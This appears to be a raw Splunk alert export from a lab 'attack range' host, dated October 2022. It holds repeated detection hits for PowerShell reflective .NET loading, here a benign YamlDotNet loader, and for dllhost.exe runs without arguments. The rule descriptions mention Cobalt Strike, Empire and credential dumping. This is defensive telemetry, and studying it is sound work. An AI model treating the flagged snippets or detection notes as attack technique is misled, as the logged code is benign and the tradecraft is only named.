[Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664920531, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T20:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T20:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664920531, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T20:16:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T20:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664920531, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T20:16:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T20:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664913600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664913600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="4572", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664913600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664913600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x11dc", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664916932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T19:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T19:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664916932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T19:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T19:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664916932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T19:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T19:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664916932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an 